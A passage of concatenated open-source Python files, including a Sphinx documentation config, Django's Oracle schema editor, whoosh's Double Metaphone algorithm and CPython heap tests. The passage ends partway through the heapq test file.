# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Add project directory to sys.path
sys.path.insert(0, os.path.abspath("../.."))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.ifconfig',
'sphinx.ext.napoleon',
]
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'pandas-validation'
copyright = '2016–2019, Markus Englund'
author = 'Markus Englund'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
version = match(
r'(^\d+\.\d+)', __import__('pandasvalidation').__version__).group(0)
# The full version, including alpha/beta/rc tags.
release = __import__('pandasvalidation').__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_test*.py', 'setup.py' ]
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'pandas-validationdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'pandas-validation.tex', 'pandas-validation Documentation',
'Markus Englund', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pandas-validation', 'pandas-validation Documentation',
[author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'pandas-validation', 'pandas-validation Documentation',
author, 'pandas-validation', 'Validation of data in pandas.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('http://docs.python.org/', None),
'pandas': ('http://pandas.pydata.org/pandas-docs/stable/', None)
}
nitpick_ignore = [('py:class', 'Warning')]
|
maxsocl/django
|
refs/heads/master
|
django/db/backends/oracle/schema.py
|
118
|
import binascii
import copy
import datetime
from django.db.backends.base.schema import BaseDatabaseSchemaEditor
from django.db.utils import DatabaseError
from django.utils import six
from django.utils.text import force_text
class DatabaseSchemaEditor(BaseDatabaseSchemaEditor):
sql_create_column = "ALTER TABLE %(table)s ADD %(column)s %(definition)s"
sql_alter_column_type = "MODIFY %(column)s %(type)s"
sql_alter_column_null = "MODIFY %(column)s NULL"
sql_alter_column_not_null = "MODIFY %(column)s NOT NULL"
sql_alter_column_default = "MODIFY %(column)s DEFAULT %(default)s"
sql_alter_column_no_default = "MODIFY %(column)s DEFAULT NULL"
sql_delete_column = "ALTER TABLE %(table)s DROP COLUMN %(column)s"
sql_delete_table = "DROP TABLE %(table)s CASCADE CONSTRAINTS"
def quote_value(self, value):
if isinstance(value, (datetime.date, datetime.time, datetime.datetime)):
return "'%s'" % value
elif isinstance(value, six.string_types):
return "'%s'" % six.text_type(value).replace("\'", "\'\'")
elif isinstance(value, six.buffer_types):
return "'%s'" % force_text(binascii.hexlify(value))
elif isinstance(value, bool):
return "1" if value else "0"
else:
return str(value)
def delete_model(self, model):
# Run superclass action
super(DatabaseSchemaEditor, self).delete_model(model)
# Clean up any autoincrement trigger
self.execute("""
DECLARE
i INTEGER;
BEGIN
SELECT COUNT(*) INTO i FROM USER_CATALOG
WHERE TABLE_NAME = '%(sq_name)s' AND TABLE_TYPE = 'SEQUENCE';
IF i = 1 THEN
EXECUTE IMMEDIATE 'DROP SEQUENCE "%(sq_name)s"';
END IF;
END;
/""" % {'sq_name': self.connection.ops._get_sequence_name(model._meta.db_table)})
def alter_field(self, model, old_field, new_field, strict=False):
try:
# Run superclass action
super(DatabaseSchemaEditor, self).alter_field(model, old_field, new_field, strict)
except DatabaseError as e:
description = str(e)
# If we're changing to/from LOB fields, we need to do a
# SQLite-ish workaround
if 'ORA-22858' in description or 'ORA-22859' in description:
self._alter_field_lob_workaround(model, old_field, new_field)
else:
raise
def _alter_field_lob_workaround(self, model, old_field, new_field):
"""
Oracle refuses to change a column type from/to LOB to/from a regular
column. In Django, this shows up when the field is changed from/to
a TextField.
What we need to do instead is:
- Add the desired field with a temporary name
- Update the table to transfer values from old to new
- Drop old column
- Rename the new column
"""
# Make a new field that's like the new one but with a temporary
# column name.
new_temp_field = copy.deepcopy(new_field)
new_temp_field.column = self._generate_temp_name(new_field.column)
# Add it
self.add_field(model, new_temp_field)
# Transfer values across
self.execute("UPDATE %s set %s=%s" % (
self.quote_name(model._meta.db_table),
self.quote_name(new_temp_field.column),
self.quote_name(old_field.column),
))
# Drop the old field
self.remove_field(model, old_field)
# Rename the new field
self.alter_field(model, new_temp_field, new_field)
def normalize_name(self, name):
"""
Get the properly shortened and uppercased identifier as returned by
quote_name(), but without the actual quotes.
"""
nn = self.quote_name(name)
if nn[0] == '"' and nn[-1] == '"':
nn = nn[1:-1]
return nn
def _generate_temp_name(self, for_name):
"""
Generates temporary names for workarounds that need temp columns
"""
suffix = hex(hash(for_name)).upper()[1:]
return self.normalize_name(for_name + "_" + suffix)
def prepare_default(self, value):
return self.quote_value(value)
|
amol9/mutils
|
refs/heads/master
|
redlib/test/testlib/test_testorder.py
|
2
|
from unittest import TestCase, main as ut_main
from redlib.testlib.testorder import order
class TestTestOrder(TestCase):
reg = []
@order(0)
def test_zero(self):
self.assertEqual(len(self.reg), 0)
self.reg.append(0)
@order(1)
def test_one(self):
self.assertEqual(len(self.reg), 1)
self.assertEqual(self.reg, [0])
self.reg.append(1)
@order(2)
def test_two(self):
self.assertEqual(len(self.reg), 2)
self.assertEqual(self.reg, [0, 1])
self.reg.append(2)
class TestDefaultOrder(TestCase):
reg = []
def test_a(self):
self.assertEqual(len(self.reg), 0)
self.reg.append(0)
def test_b(self):
self.assertEqual(len(self.reg), 1)
self.assertEqual(self.reg, [0])
self.reg.append(1)
def test_c(self):
self.assertEqual(len(self.reg), 2)
self.assertEqual(self.reg, [0, 1])
self.reg.append(2)
if __name__ == '__main__':
ut_main()
|
andrewfu0325/gem5-aladdin
|
refs/heads/ruby
|
tests/quick/se/02.insttest/test.py
|
56
|
# Copyright (c) 2007 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ali Saidi
root.system.cpu[0].workload = LiveProcess(cmd = 'insttest',
executable = binpath('insttest'))
|
PJB3005/MoMMI
|
refs/heads/v2
|
MoMMI/module.py
|
1
|
from typing import Dict, Any
class MModule(object):
def __init__(self, name: str) -> None:
from .handler import MHandler
self.name: str = name
self.handlers: Dict[str, MHandler] = {}
self.loaded: bool = False
# The actual module
self.module: Any = None
|
bdh1011/cupeye
|
refs/heads/master
|
venv/lib/python2.7/site-packages/whoosh/lang/dmetaphone.py
|
96
|
# coding= utf-8
# This script implements the Double Metaphone algorythm (c) 1998, 1999 by
# Lawrence Philips. It was translated to Python from the C source written by
# Kevin Atkinson (http://aspell.net/metaphone/) By Andrew Collins - January 12,
# 2007 who claims no rights to this work.
# http://atomboy.isa-geek.com:8080/plone/Members/acoil/programing/double-metaphone
import re
from whoosh.compat import u
vowels = frozenset("AEIOUY")
slavo_germ_exp = re.compile("W|K|CZ|WITZ")
silent_starts = re.compile("GN|KN|PN|WR|PS")
def double_metaphone(text):
text = text.upper()
slavo_germanic = bool(slavo_germ_exp.search(text))
length = len(text)
text = "--" + text + " "
first = pos = 2
last = first + length - 1
primary = secondary = ""
if silent_starts.match(text, pos):
pos += 1
while pos < length + 2:
ch = text[pos]
if ch in vowels:
# all init vowels now map to 'A'
if pos != first:
next = (None, 1)
else:
next = ("A", 1)
elif ch == "B":
#"-mb", e.g", "dumb", already skipped over... see 'M' below
if text[pos + 1] == "B":
next = ("P", 2)
else:
next = ("P", 1)
elif ch == "C":
# various germanic
if (pos > (first + 1) and text[pos - 2] not in vowels and text[pos - 1:pos + 2] == 'ACH' and \
(text[pos + 2] not in ['I', 'E'] or text[pos - 2:pos + 4] in ['BACHER', 'MACHER'])):
next = ('K', 2)
# special case 'CAESAR'
elif pos == first and text[first:first + 6] == 'CAESAR':
next = ('S', 2)
elif text[pos:pos + 4] == 'CHIA': # italian 'chianti'
next = ('K', 2)
elif text[pos:pos + 2] == 'CH':
# find 'michael'
if pos > first and text[pos:pos + 4] == 'CHAE':
next = ('K', 'X', 2)
elif pos == first and (text[pos + 1:pos + 6] in ['HARAC', 'HARIS'] or \
text[pos + 1:pos + 4] in ["HOR", "HYM", "HIA", "HEM"]) and text[first:first + 5] != 'CHORE':
next = ('K', 2)
# germanic, greek, or otherwise 'ch' for 'kh' sound
elif text[first:first + 4] in ['VAN ', 'VON '] or text[first:first + 3] == 'SCH' \
or text[pos - 2:pos + 4] in ["ORCHES", "ARCHIT", "ORCHID"] \
or text[pos + 2] in ['T', 'S'] \
or ((text[pos - 1] in ["A", "O", "U", "E"] or pos == first) \
and text[pos + 2] in ["L", "R", "N", "M", "B", "H", "F", "V", "W", " "]):
next = ('K', 1)
else:
if pos > first:
if text[first:first + 2] == 'MC':
next = ('K', 2)
else:
next = ('X', 'K', 2)
else:
next = ('X', 2)
# e.g, 'czerny'
elif text[pos:pos + 2] == 'CZ' and text[pos - 2:pos + 2] != 'WICZ':
next = ('S', 'X', 2)
# e.g., 'focaccia'
elif text[pos + 1:pos + 4] == 'CIA':
next = ('X', 3)
# double 'C', but not if e.g. 'McClellan'
elif text[pos:pos + 2] == 'CC' and not (pos == (first + 1) and text[first] == 'M'):
# 'bellocchio' but not 'bacchus'
if text[pos + 2] in ["I", "E", "H"] and text[pos + 2:pos + 4] != 'HU':
# 'accident', 'accede' 'succeed'
if (pos == (first + 1) and text[first] == 'A') or \
text[pos - 1:pos + 4] in ['UCCEE', 'UCCES']:
next = ('KS', 3)
# 'bacci', 'bertucci', other italian
else:
next = ('X', 3)
else:
next = ('K', 2)
elif text[pos:pos + 2] in ["CK", "CG", "CQ"]:
next = ('K', 'K', 2)
elif text[pos:pos + 2] in ["CI", "CE", "CY"]:
# italian vs. english
if text[pos:pos + 3] in ["CIO", "CIE", "CIA"]:
next = ('S', 'X', 2)
else:
next = ('S', 2)
else:
# name sent in 'mac caffrey', 'mac gregor
if text[pos + 1:pos + 3] in [" C", " Q", " G"]:
next = ('K', 3)
else:
if text[pos + 1] in ["C", "K", "Q"] and text[pos + 1:pos + 3] not in ["CE", "CI"]:
next = ('K', 2)
else: # default for 'C'
next = ('K', 1)
elif ch == u('\xc7'):
next = ('S', 1)
elif ch == 'D':
if text[pos:pos + 2] == 'DG':
if text[pos + 2] in ['I', 'E', 'Y']: # e.g. 'edge'
next = ('J', 3)
else:
next = ('TK', 2)
elif text[pos:pos + 2] in ['DT', 'DD']:
next = ('T', 2)
else:
next = ('T', 1)
elif ch == 'F':
if text[pos + 1] == 'F':
next = ('F', 2)
else:
next = ('F', 1)
elif ch == 'G':
if text[pos + 1] == 'H':
if pos > first and text[pos - 1] not in vowels:
next = ('K', 2)
elif pos < (first + 3):
if pos == first: # 'ghislane', ghiradelli
if text[pos + 2] == 'I':
next = ('J', 2)
else:
next = ('K', 2)
# Parker's rule (with some further refinements) - e.g., 'hugh'
elif (pos > (first + 1) and text[pos - 2] in ['B', 'H', 'D']) \
or (pos > (first + 2) and text[pos - 3] in ['B', 'H', 'D']) \
or (pos > (first + 3) and text[pos - 4] in ['B', 'H']):
next = (None, 2)
else:
# e.g., 'laugh', 'McLaughlin', 'cough', 'gough', 'rough', 'tough'
if pos > (first + 2) and text[pos - 1] == 'U' \
and text[pos - 3] in ["C", "G", "L", "R", "T"]:
next = ('F', 2)
else:
if pos > first and text[pos - 1] != 'I':
next = ('K', 2)
elif text[pos + 1] == 'N':
if pos == (first + 1) and text[first] in vowels and not slavo_germanic:
next = ('KN', 'N', 2)
else:
# not e.g. 'cagney'
if text[pos + 2:pos + 4] != 'EY' and text[pos + 1] != 'Y' and not slavo_germanic:
next = ('N', 'KN', 2)
else:
next = ('KN', 2)
# 'tagliaro'
elif text[pos + 1:pos + 3] == 'LI' and not slavo_germanic:
next = ('KL', 'L', 2)
# -ges-,-gep-,-gel-, -gie- at beginning
elif pos == first and (text[pos + 1] == 'Y' \
or text[pos + 1:pos + 3] in ["ES", "EP", "EB", "EL", "EY", "IB", "IL", "IN", "IE", "EI", "ER"]):
next = ('K', 'J', 2)
# -ger-, -gy-
elif (text[pos + 1:pos + 2] == 'ER' or text[pos + 1] == 'Y') \
and text[first:first + 6] not in ["DANGER", "RANGER", "MANGER"] \
and text[pos - 1] not in ['E', 'I'] and text[pos - 1:pos + 2] not in ['RGY', 'OGY']:
next = ('K', 'J', 2)
# italian e.g, 'biaggi'
elif text[pos + 1] in ['E', 'I', 'Y'] or text[pos - 1:pos + 3] in ["AGGI", "OGGI"]:
# obvious germanic
if text[first:first + 4] in ['VON ', 'VAN '] or text[first:first + 3] == 'SCH' \
or text[pos + 1:pos + 3] == 'ET':
next = ('K', 2)
else:
# always soft if french ending
if text[pos + 1:pos + 5] == 'IER ':
next = ('J', 2)
else:
next = ('J', 'K', 2)
elif text[pos + 1] == 'G':
next = ('K', 2)
else:
next = ('K', 1)
elif ch == 'H':
# only keep if first & before vowel or btw. 2 vowels
if (pos == first or text[pos - 1] in vowels) and text[pos + 1] in vowels:
next = ('H', 2)
else: # (also takes care of 'HH')
next = (None, 1)
elif ch == 'J':
# obvious spanish, 'jose', 'san jacinto'
if text[pos:pos + 4] == 'JOSE' or text[first:first + 4] == 'SAN ':
if (pos == first and text[pos + 4] == ' ') or text[first:first + 4] == 'SAN ':
next = ('H',)
else:
next = ('J', 'H')
elif pos == first and text[pos:pos + 4] != 'JOSE':
next = ('J', 'A') # Yankelovich/Jankelowicz
else:
# spanish pron. of e.g. 'bajador'
if text[pos - 1] in vowels and not slavo_germanic \
and text[pos + 1] in ['A', 'O']:
next = ('J', 'H')
else:
if pos == last:
next = ('J', ' ')
else:
if text[pos + 1] not in ["L", "T", "K", "S", "N", "M", "B", "Z"] \
and text[pos - 1] not in ["S", "K", "L"]:
next = ('J',)
else:
next = (None,)
if text[pos + 1] == 'J':
next = next + (2,)
else:
next = next + (1,)
elif ch == 'K':
if text[pos + 1] == 'K':
next = ('K', 2)
else:
next = ('K', 1)
elif ch == 'L':
if text[pos + 1] == 'L':
# spanish e.g. 'cabrillo', 'gallegos'
if (pos == (last - 2) and text[pos - 1:pos + 3] in ["ILLO", "ILLA", "ALLE"]) \
or ((text[last - 1:last + 1] in ["AS", "OS"] or text[last] in ["A", "O"]) \
and text[pos - 1:pos + 3] == 'ALLE'):
next = ('L', '', 2)
else:
next = ('L', 2)
else:
next = ('L', 1)
elif ch == 'M':
if text[pos + 1:pos + 4] == 'UMB' \
and (pos + 1 == last or text[pos + 2:pos + 4] == 'ER') \
or text[pos + 1] == 'M':
next = ('M', 2)
else:
next = ('M', 1)
elif ch == 'N':
if text[pos + 1] == 'N':
next = ('N', 2)
else:
next = ('N', 1)
elif ch == u('\xd1'):
next = ('N', 1)
elif ch == 'P':
if text[pos + 1] == 'H':
next = ('F', 2)
elif text[pos + 1] in ['P', 'B']: # also account for "campbell", "raspberry"
next = ('P', 2)
else:
next = ('P', 1)
elif ch == 'Q':
if text[pos + 1] == 'Q':
next = ('K', 2)
else:
next = ('K', 1)
elif ch == 'R':
# french e.g. 'rogier', but exclude 'hochmeier'
if pos == last and not slavo_germanic \
and text[pos - 2:pos] == 'IE' and text[pos - 4:pos - 2] not in ['ME', 'MA']:
next = ('', 'R')
else:
next = ('R',)
if text[pos + 1] == 'R':
next = next + (2,)
else:
next = next + (1,)
elif ch == 'S':
# special cases 'island', 'isle', 'carlisle', 'carlysle'
if text[pos - 1:pos + 2] in ['ISL', 'YSL']:
next = (None, 1)
# special case 'sugar-'
elif pos == first and text[first:first + 5] == 'SUGAR':
next = ('X', 'S', 1)
elif text[pos:pos + 2] == 'SH':
# germanic
if text[pos + 1:pos + 5] in ["HEIM", "HOEK", "HOLM", "HOLZ"]:
next = ('S', 2)
else:
next = ('X', 2)
# italian & armenian
elif text[pos:pos + 3] in ["SIO", "SIA"] or text[pos:pos + 4] == 'SIAN':
if not slavo_germanic:
next = ('S', 'X', 3)
else:
next = ('S', 3)
# german & anglicisations, e.g. 'smith' match 'schmidt', 'snider' match 'schneider'
# also, -sz- in slavic language altho in hungarian it is pronounced 's'
elif (pos == first and text[pos + 1] in ["M", "N", "L", "W"]) or text[pos + 1] == 'Z':
next = ('S', 'X')
if text[pos + 1] == 'Z':
next = next + (2,)
else:
next = next + (1,)
elif text[pos:pos + 2] == 'SC':
# Schlesinger's rule
if text[pos + 2] == 'H':
# dutch origin, e.g. 'school', 'schooner'
if text[pos + 3:pos + 5] in ["OO", "ER", "EN", "UY", "ED", "EM"]:
# 'schermerhorn', 'schenker'
if text[pos + 3:pos + 5] in ['ER', 'EN']:
next = ('X', 'SK', 3)
else:
next = ('SK', 3)
else:
if pos == first and text[first + 3] not in vowels and text[first + 3] != 'W':
next = ('X', 'S', 3)
else:
next = ('X', 3)
elif text[pos + 2] in ['I', 'E', 'Y']:
next = ('S', 3)
else:
next = ('SK', 3)
# french e.g. 'resnais', 'artois'
elif pos == last and text[pos - 2:pos] in ['AI', 'OI']:
next = ('', 'S', 1)
else:
next = ('S',)
if text[pos + 1] in ['S', 'Z']:
next = next + (2,)
else:
next = next + (1,)
elif ch == 'T':
if text[pos:pos + 4] == 'TION':
next = ('X', 3)
elif text[pos:pos + 3] in ['TIA', 'TCH']:
next = ('X', 3)
elif text[pos:pos + 2] == 'TH' or text[pos:pos + 3] == 'TTH':
# special case 'thomas', 'thames' or germanic
if text[pos + 2:pos + 4] in ['OM', 'AM'] or text[first:first + 4] in ['VON ', 'VAN '] \
or text[first:first + 3] == 'SCH':
next = ('T', 2)
else:
next = ('0', 'T', 2)
elif text[pos + 1] in ['T', 'D']:
next = ('T', 2)
else:
next = ('T', 1)
elif ch == 'V':
if text[pos + 1] == 'V':
next = ('F', 2)
else:
next = ('F', 1)
elif ch == 'W':
# can also be in middle of word
if text[pos:pos + 2] == 'WR':
next = ('R', 2)
elif pos == first and (text[pos + 1] in vowels or text[pos:pos + 2] == 'WH'):
# Wasserman should match Vasserman
if text[pos + 1] in vowels:
next = ('A', 'F', 1)
else:
next = ('A', 1)
# Arnow should match Arnoff
elif (pos == last and text[pos - 1] in vowels) \
or text[pos - 1:pos + 5] in ["EWSKI", "EWSKY", "OWSKI", "OWSKY"] \
or text[first:first + 3] == 'SCH':
next = ('', 'F', 1)
# polish e.g. 'filipowicz'
elif text[pos:pos + 4] in ["WICZ", "WITZ"]:
next = ('TS', 'FX', 4)
else: # default is to skip it
next = (None, 1)
elif ch == 'X':
# french e.g. breaux
next = (None,)
if not(pos == last and (text[pos - 3:pos] in ["IAU", "EAU"] \
or text[pos - 2:pos] in ['AU', 'OU'])):
next = ('KS',)
if text[pos + 1] in ['C', 'X']:
next = next + (2,)
else:
next = next + (1,)
elif ch == 'Z':
# chinese pinyin e.g. 'zhao'
if text[pos + 1] == 'H':
next = ('J',)
elif text[pos + 1:pos + 3] in ["ZO", "ZI", "ZA"] \
or (slavo_germanic and pos > first and text[pos - 1] != 'T'):
next = ('S', 'TS')
else:
next = ('S',)
if text[pos + 1] == 'Z':
next = next + (2,)
else:
next = next + (1,)
else:
next = (None, 1)
if len(next) == 2:
if next[0]:
primary += next[0]
secondary += next[0]
pos += next[1]
elif len(next) == 3:
if next[0]:
primary += next[0]
if next[1]:
secondary += next[1]
pos += next[2]
if primary == secondary:
return (primary, None)
else:
return (primary, secondary)
|
eckucukoglu/arm-linux-gnueabihf
|
refs/heads/master
|
lib/python2.7/test/test_heapq.py
|
42
|
"""Unittests for heapq."""
import sys
import random
from test import test_support
from unittest import TestCase, skipUnless
py_heapq = test_support.import_fresh_module('heapq', blocked=['_heapq'])
c_heapq = test_support.import_fresh_module('heapq', fresh=['_heapq'])
# _heapq.nlargest/nsmallest are saved in heapq._nlargest/_smallest when
# _heapq is imported, so check them there
func_names = ['heapify', 'heappop', 'heappush', 'heappushpop',
'heapreplace', '_nlargest', '_nsmallest']
class TestModules(TestCase):
def test_py_functions(self):
for fname in func_names:
self.assertEqual(getattr(py_heapq, fname).__module__, 'heapq')
@skipUnless(c_heapq, 'requires _heapq')
def test_c_functions(self):
for fname in func_names:
self.assertEqual(getattr(c_heapq, fname).__module__, '_heapq')
class TestHeap(TestCase):
module = None
def test_push_pop(self):
# 1) Push 256 random numbers and pop them off, verifying all's OK.
heap = []
data = []
self.check_invariant(heap)
for i in range(256):
item = random.random()
data.append(item)
self.module.heappush(heap, item)
self.check_invariant(heap)
results = []
while heap:
item = self.module.heappop(heap)
self.check_invariant(heap)
results.append(item)
data_sorted = data[:]
data_sorted.sort()
self.assertEqual(data_sorted, results)
# 2) Check that the invariant holds for a sorted array
self.check_invariant(results)
self.assertRaises(TypeError, self.module.heappush, [])
try:
self.assertRaises(TypeError, self.module.heappush, None, None)
self.assertRaises(TypeError, self.module.heappop, None)
except AttributeError:
pass
def check_invariant(self, heap):
# Check the heap invariant.
for pos, item in enumerate(heap):
if pos: # pos 0 has no parent
parentpos = (pos-1) >> 1
self.assertTrue(heap[parentpos] <= item)
def test_heapify(self):
for size in range(30):
heap = [random.random() for dummy in range(size)]
self.module.heapify(heap)
self.check_invariant(heap)
self.assertRaises(TypeError, self.module.heapify, None)
def test_naive_nbest(self):
data = [random.randrange(2000) for i in range(1000)]
heap = []
for item in data:
self.module.heappush(heap, item)
if len(heap) > 10:
self.module.heappop(heap)
heap.sort()
self.assertEqual(heap, sorted(data)[-10:])
def heapiter(self, heap):
# An iterator returning a heap's elements, smallest-first.
try:
while 1:
yield self.module.heappop(heap)
except IndexError:
pass
def test_nbest(self):
# Less-naive "N-best" algorithm, much faster (if len(data) is big
# enough <wink>) than sorting all of data. However, if we had a max
# heap instead of a min heap, it could go faster still via
# heapify'ing all of data (linear time), then doing 10 heappops
# (10 log-time steps).
data = [random.randrange(2000) for i in range(1000)]
heap = data[:10]
self.module.heapify(heap)
for item in data[10:]:
if item > heap[0]: # this gets rarer the longer we run
self.module.heapreplace(heap, item)
self.assertEqual(list(self.heapiter(heap)), sorted(data)[-10:])
self.assertRaises(TypeError, self.module.heapreplace, None)
self.assertRaises(TypeError, self.module.heapreplace, None, None)
self.assertRaises(IndexError, self.module.heapreplace, [], None)
def test_nbest_with_pushpop(self):
data = [random.randrange(2000) for i in range(1000)]
heap = data[:10]
self.module.heapify(heap)
for item in data[10:]:
self.module.heappushpop(heap, item)
self.assertEqual(list(self.heapiter(heap)), sorted(data)[-10:])
self.assertEqual(self.module.heappushpop([], 'x'), 'x')
def test_heappushpop(self):
h = []
x = self.module.heappushpop(h, 10)
self.assertEqual((h, x), ([], 10))
h = [10]
x = self.module.heappushpop(h, 10.0)
self.assertEqual((h, x), ([10], 10.0))
self.assertEqual(type(h[0]), int)
self.assertEqual(type(x), float)
h = [10];
x = self.module.heappushpop(h, 9)
self.assertEqual((h, x), ([10], 9))
h = [10];
x = self.module.heappushpop(h, 11)
self.assertEqual((h, x), ([11], 10))
def test_heapsort(self):
# Exercise everything with repeated heapsort checks
for trial in xrange(100):
size = random.randrange(50)
data = [random.randrange(25) for i in range(size)]
